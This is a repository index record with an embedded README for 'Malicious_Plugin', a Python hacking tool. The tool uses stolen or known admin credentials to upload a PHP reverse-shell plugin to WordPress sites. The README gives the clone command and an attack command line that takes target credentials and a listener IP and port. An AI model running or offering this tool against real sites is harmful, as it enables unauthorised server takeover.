{"id":20847284,"url":"https://github.com/jsmoreira02/malicious_plugin","last_synced_at":"2025-08-20T04:02:41.668Z","repository":{"id":169264613,"uuid":"645138243","full_name":"Jsmoreira02/Malicious_Plugin","owner":"Jsmoreira02","description":"Hacking WordPress Plugins - Authenticated Shell Upload, by compromising admin console and upload a malicious plugin with PHP (reverse shell code)","archived":false,"fork":false,"pushed_at":"2024-09-22T08:46:02.000Z","size":78,"stargazers_count":13,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-31T22:01:48.656Z","etag":null,"topics":["cybersecurity","hacking-tool","pwntools","python3","reverse-shell","web-exploitation","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Jsmoreira02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-25T02:24:21.000Z","updated_at":"2024-12-07T14:46:46.000Z","dependencies_parsed_at":"2023-07-31T06:44:55.773Z","dependency_job_id":"f6dbfcf9-a2b7-4781-bd94-e71e05d64d29","html_url":"https://github.com/Jsmoreira02/Malicious_Plugin","commit_stats":null,"previous_names":["joaopedromoreira02/pwn_wordpress","j0hnth3kn1ght/pwn_wordpress","jsmoreira02/pwn_wordpress","jsmoreira02/_malicious","jsmoreira02/malicious_plugin"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FMalicious_Plugin","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FMalicious_Plugin/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FMalicious_Plugin/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FMalicious_Plugin/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Jsmoreira02","download_url":"https://codeload.github.com/Jsmoreira02/Malicious_Plugin/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253662591,"owners_count":21944099,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","hacking-tool","pwntools","python3","reverse-shell","web-exploitation","wordpress-plugin"],"created_at":"2024-11-18T02:19:33.806Z","updated_at":"2025-05-12T02:31:16.114Z","avatar_url":"https://github.com/Jsmoreira02.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\u003cdiv align=\"center\"\u003e\n\n  \u003cimg src=\"https://github.com/Jsmoreira02/Pwn_wordpress/assets/103542430/6392fe40-bfff-4784-acfd-645ba2155574\" height=130\u003e\n  \n  \u003cimg src=\"https://img.shields.io/badge/Language%20-Python3-blue.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Tool%20-Shell upload | reverse shell-brown.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Target OS%20-Linux-yellow.svg\" style=\"max-width: 100%;\"\u003e\n  \u003cimg src=\"https://img.shields.io/badge/Hacking tool%20-teste?style=flat-square\" style=\"max-width: 100%;\"\u003e  \n  \u003cimg src=\"https://img.shields.io/badge/Type%20-Script-red.svg\" style=\"max-width: 100%;\"\u003e\n\n\u003c/div\u003e\n\n# Evil Wordpress Plugin (Malicious)\n\nMalicious, remotely performs an upload of a PHP reverse shell in the form of a plugin on a WordPress site. The exploit is only successful with user credentials, so make sure you know the target username and password and check if the target user has Administrator permissions.\n\nInstall by running:\n\n```bash\n  git clone https://github.com/Jsmoreira02/Malicious_Plugin.git\n```\n    \n## Attacking the Target Website:\n\n![ezgif com-video-to-gif(1)](https://github.com/Jsmoreira02/Pwn_Wordpress/assets/103542430/532470ab-161f-487d-a59b-f3d0d7366c25)\n\n\n- **The speed depends on your connection, check the stability of your connection in case there is a slowdown in execution**\n\n\n```bash \npython3 Malicious.py -t http://\u003cIP or domain_name\u003e -u \u003cTarget Username\u003e -p \u003cTarget Password\u003e -L \u003cLOCAL IP\u003e -P \u003cLOCAL PORT\u003e\n\n```\n\n### In case of complications or disconnection issues, you can just manually trigger the connection at the URL link. The script will pass it to you. ###\n\n## \n\n- ***Good hacking :)***\n\n# Warning:    \n\u003e I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil and is intended to raise awareness about cybersecurity\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fmalicious_plugin","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjsmoreira02%2Fmalicious_plugin","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fmalicious_plugin/lists"}